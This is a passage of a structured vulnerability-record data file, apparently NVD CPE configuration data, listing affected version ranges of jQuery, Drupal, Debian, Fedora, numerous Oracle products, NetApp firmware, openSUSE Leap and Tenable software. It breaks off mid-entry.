{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:*", matchCriteriaId: "B5CFA4CA-5296-4B78-8D65-34FC63A09DEF", versionEndExcluding: "3.5.0", versionStartIncluding: "1.2", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", matchCriteriaId: "70C672EE-2027-4A29-8C14-3450DEF1462A", versionEndExcluding: "7.70", versionStartIncluding: "7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", matchCriteriaId: "BBFE42E2-6583-4EBE-B320-B8CF9CA0C3BC", versionEndExcluding: "8.7.14", versionStartIncluding: "8.7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", matchCriteriaId: "7BA49DB0-ECC3-4155-B76C-0CA292600DE6", versionEndExcluding: "8.8.6", versionStartIncluding: "8.8.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", matchCriteriaId: "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", vulnerable: true, }, { criteria: "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", matchCriteriaId: "36D96259-24BD-44E2-96D9-78CE1D41F956", vulnerable: true, }, { criteria: "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", matchCriteriaId: "E460AA51-FCDA-46B9-AE97-E6676AA5E194", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A079FD6E-3BB0-4997-9A8E-6F8FEC89887A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", matchCriteriaId: "A125E817-F974-4509-872C-B71933F42AD1", vulnerable: true, }, { 
criteria: "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", matchCriteriaId: "BBE7BF09-B89C-4590-821E-6C0587E096B5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", matchCriteriaId: "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", matchCriteriaId: "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", matchCriteriaId: "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", matchCriteriaId: "18127694-109C-4E7E-AE79-0BA351849291", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", matchCriteriaId: "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "D0DBC938-A782-433F-8BF1-CA250C332AA7", versionEndExcluding: "21.1.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:*", matchCriteriaId: "B796AC70-A220-48D8-B8CD-97CF57227962", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:*", matchCriteriaId: "790A89FD-6B86-49AE-9B4F-AE7262915E13", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E39D442D-1997-49AF-8B02-5640BE2A26CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\\::*:*:*:*:*:*:*:*", matchCriteriaId: "FAFED7F5-03FA-43B5-AD13-1130F0324448", versionEndIncluding: "8.2.2", versionStartIncluding: "8.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:*", matchCriteriaId: 
"1A0E3537-CB5A-40BF-B42C-CED9211B8892", versionEndIncluding: "16.4.0", versionStartIncluding: "16.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*", matchCriteriaId: "062E4E7C-55BB-46F3-8B61-5A663B565891", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:*", matchCriteriaId: "726DB59B-00C7-444E-83F7-CB31032482AB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B095CC03-7077-4A58-AB25-CC5380CDCE5A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:*", matchCriteriaId: "7015A8CB-8FA6-423E-8307-BD903244F517", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "F2BB6A71-6AF6-4C0B-9304-4111E32108D4", versionEndIncluding: "8.1.0.0.0", versionStartIncluding: "8.0.6.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "AD080793-FC45-4260-8E45-40E228F432FC", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "2ACA29E6-F393-46E5-B2B3-9158077819A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "FCD1EC13-CC2F-4668-90D2-D8609066F2DF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "4D614F76-0AA1-4EA8-A24A-38EFC90EF5DB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "39B8DFFF-B037-4F29-8C8E-F4BBC3435199", 
vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "4D0D0EAC-300D-44B1-AD4A-93A368D5DBA1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:*", matchCriteriaId: "C5E0646D-4866-41FB-AE2E-5307B6F4004A", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "8A566893-8DCF-49E4-93D0-0ACCEFD70D3D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:*", matchCriteriaId: "B37FC113-4F40-4D29-8712-7AD250373008", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "00E5D719-249D-48B8-BAFC-1E14D250B3F6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:*", matchCriteriaId: "712577A9-04D6-4579-A82B-72200E467399", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:*", matchCriteriaId: "672949B4-1989-4AA7-806F-EEC07D07F317", versionEndIncluding: "8.0.9", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "987A0C35-4C7F-4FFB-B47B-37B69A32F879", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "8B3B6BE3-4C5A-402F-832C-86A0A6234C25", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:*", 
matchCriteriaId: "9476D1DA-C8A8-40A0-94DD-9B46C05FD461", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "34070F24-2E53-43EC-9117-E1434B2C4C2B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "B9B2C2F6-235F-4E78-A299-18C041C05C9A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "F727AAC6-6D9F-4B28-B07C-6A93916C43A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:*", matchCriteriaId: "6662C783-5B5C-4559-89F5-1A681AA46A3E", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "51C17460-D326-4525-A7D1-0AED53E75E18", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "37C8EE84-A840-4132-B331-C7D450B1FBBF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "1D8436A2-9CA3-4C91-B632-9B03368ABC1B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A00142E6-EEB3-44BD-AB0D-0E5C5640557F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "6149C89E-0111-4CF9-90CA-0662D2F75E04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "6CDDF6CA-6441-4606-9D2F-22A67BA46978", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "6FA0B592-A216-4320-A4FE-ABCA6B3E7D7A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "CEA4D6CF-D54A-40DF-9B70-E13392D0BE19", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:*", matchCriteriaId: "2A333755-4B6E-4A0F-AC48-4CEA70CD5801", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "397B1A24-7C95-4A73-8363-4529A7F6CFCC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "EF6D5112-4055-4F89-A5B3-0DCB109481B7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "D262848E-AA24-4057-A747-6221BA22ADF4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "4A01F8ED-64DA-43BC-9C02-488010BCD0F4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "75638A6A-88B2-4BC7-84EA-1CF5FC30D555", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "501B9331-6BB7-44BF-A664-180CAFABF88C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "F2A3AE3C-8E24-4FB6-9954-9B50CBD59B21", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: 
"F8E565DA-91BE-44FC-A28F-579BE8D2281A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:*:*:*:*:*:*:*:*", matchCriteriaId: "AED72F90-3B68-45AC-865C-110F7FD30D37", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:*", matchCriteriaId: "4F909C61-1A74-402C-B74F-BAF7297875B0", versionEndIncluding: "8.0.9", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:*", matchCriteriaId: "26A1F27B-C3AC-4D13-B9B2-2D6CF65D07BC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:*", matchCriteriaId: "B95E8056-51D8-4390-ADE3-661B7AE1D7CE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2.1:*:*:*:*:*:*:*", matchCriteriaId: "609D6EDF-D4D0-4370-9B8B-CA39D41946C0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9059A907-508B-4844-8D7B-0FA68C0DF6A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:*", matchCriteriaId: "2AC63D10-2326-4542-B345-31D45B9A7408", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:*", matchCriteriaId: "7BFD7783-BE15-421C-A550-7FE15AB53ABF", versionEndIncluding: "19.1.2", versionStartIncluding: "19.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:*", matchCriteriaId: "1F7BF047-03C5-4A60-B718-E222B16DBF41", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:*", matchCriteriaId: "E3A73D81-3E1A-42E6-AB96-835CDD5905F2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:*", matchCriteriaId: "66136D6D-FC52-40DB-B7B6-BA8B7758CE16", vulnerable: 
true, }, { criteria: "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "06514F46-544B-4404-B45C-C9584EBC3131", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "3BD4BF9A-BF38-460D-974D-5B3255AAF946", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:*", matchCriteriaId: "B7DB4831-F874-4D9D-AB58-BE4A554891EA", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:*", matchCriteriaId: "B47C73D0-BE89-4D87-8765-12C507F13AFF", versionEndIncluding: "5.6.0.0", versionStartIncluding: "5.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:*", matchCriteriaId: "5B8AA91A-1880-43CD-938D-48EF58ACF2CF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", matchCriteriaId: "D0A735B4-4F3C-416B-8C08-9CB21BAD2889", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", matchCriteriaId: "7E1E416B-920B-49A0-9523-382898C2979D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", matchCriteriaId: "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:*", matchCriteriaId: "15512D27-7BEB-4DDD-9A1B-447FC7156E3D", versionEndIncluding: "12.2.20", versionStartIncluding: "12.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*", matchCriteriaId: "0DB5E2C7-9C68-4D3B-95AD-9CBF65DE1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:*", matchCriteriaId: "90F0B2AB-453C-4585-8753-74D17BD20C79", versionEndIncluding: "12.2.20", versionStartIncluding: "12.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:*", matchCriteriaId: "31C7EEA3-AA72-48DA-A112-2923DBB37773", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*", matchCriteriaId: "F0735989-13BD-40B3-B954-AC0529C5B53D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:*", matchCriteriaId: "9EFAEA84-E376-40A2-8C9F-3E0676FEC527", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:*", matchCriteriaId: "959316A8-C3AF-4126-A242-3835ED0AD1E8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*", matchCriteriaId: "BDB925C6-2CBC-4D88-B9EA-F246F4F7A206", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:*", matchCriteriaId: "98B9198C-11DF-4E80-ACFC-DC719CED8C7E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:*", matchCriteriaId: "6953CFDB-33C0-4B8E-BBBD-E460A17E8ED3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B40B13B7-68B3-4510-968C-6A730EB46462", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "C93CC705-1F8C-4870-99E6-14BF264C3811", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:*", matchCriteriaId: "FD1FCB0D-3E19-4461-9330-4D7F02972A35", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", matchCriteriaId: "F1BE6C1F-2565-4E97-92AA-16563E5660A5", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "B9273745-6408-4CD3-94E8-9385D4F5FE69", versionEndIncluding: "3.1.3", versionStartIncluding: "3.0", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:*", matchCriteriaId: "9F4754FB-E3EB-454A-AB1A-AE3835C5350C", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", matchCriteriaId: "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "6770B6C3-732E-4E22-BF1C-2D2FD610061C", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*", matchCriteriaId: "9F9C8C20-42EB-4AB5-BD97-212DEB070C43", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "7FFF7106-ED78-49BA-9EC5-B889E3685D53", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: 
"cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*", matchCriteriaId: "E63D8B0F-006E-4801-BF9D-1C001BBFB4F9", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "56409CEC-5A1E-4450-AA42-641E459CC2AF", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*", matchCriteriaId: "B06F4839-D16A-4A61-9BB5-55B13F41E47F", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "108A2215-50FB-4074-94CF-C130FA14566D", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*", matchCriteriaId: "7AFC73CE-ABB9-42D3-9A71-3F5BC5381E0E", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "32F0B6C0-F930-480D-962B-3F4EFDCC13C7", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*", matchCriteriaId: "803BC414-B250-4E3A-A478-A3881340D6B8", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "0FEB3337-BFDE-462A-908B-176F92053CEC", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*", matchCriteriaId: "736AEAE9-782B-4F71-9893-DED53367E102", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "D0B4AD8A-F172-4558-AEC6-FF424BA2D912", vulnerable: true, }, ], negate: 
false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*", matchCriteriaId: "8497A4C9-8474-4A62-8331-3FE862ED4098", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "234DEFE0-5CE5-4B0A-96B8-5D227CB8ED31", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*", matchCriteriaId: "CDDF61B7-EC5C-467C-B710-B89F502CD04F", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", matchCriteriaId: "B620311B-34A3-48A6-82DF-6F078D7A4493", vulnerable: true, }, { criteria: "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", matchCriteriaId: "B009C22E-30A4-4288-BCF6-C3E81DEAF45A", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:*", matchCriteriaId: "4ACF85D6-6B45-43DA-9C01-F0208186F014", versionEndExcluding: "6.0.9", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:agile_product_supplier_collaboration_for_process:6.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "CA6F2E4C-C935-40CF-972E-8C3D8A912134", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:*:*:*:*:*:*:*:*", matchCriteriaId: "59830587-A6B0-4642-B566-6FD8792F7716", versionEndIncluding: "20.1", versionStartIncluding: "18.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:*", matchCriteriaId: "B796AC70-A220-48D8-B8CD-97CF57227962", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:*", matchCriteriaId: "790A89FD-6B86-49AE-9B4F-AE7262915E13", vulnerable: 
true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E39D442D-1997-49AF-8B02-5640BE2A26CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\\::*:*:*:*:*:*:*:*", matchCriteriaId: "FAFED7F5-03FA-43B5-AD13-1130F0324448", versionEndIncluding: "8.2.2", versionStartIncluding: "8.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:*", matchCriteriaId: "726DB59B-00C7-444E-83F7-CB31032482AB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B095CC03-7077-4A58-AB25-CC5380CDCE5A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:*", matchCriteriaId: "7015A8CB-8FA6-423E-8307-BD903244F517", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "021014B2-DC51-481C-BCFE-5857EFBDEDDA", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:*", matchCriteriaId: 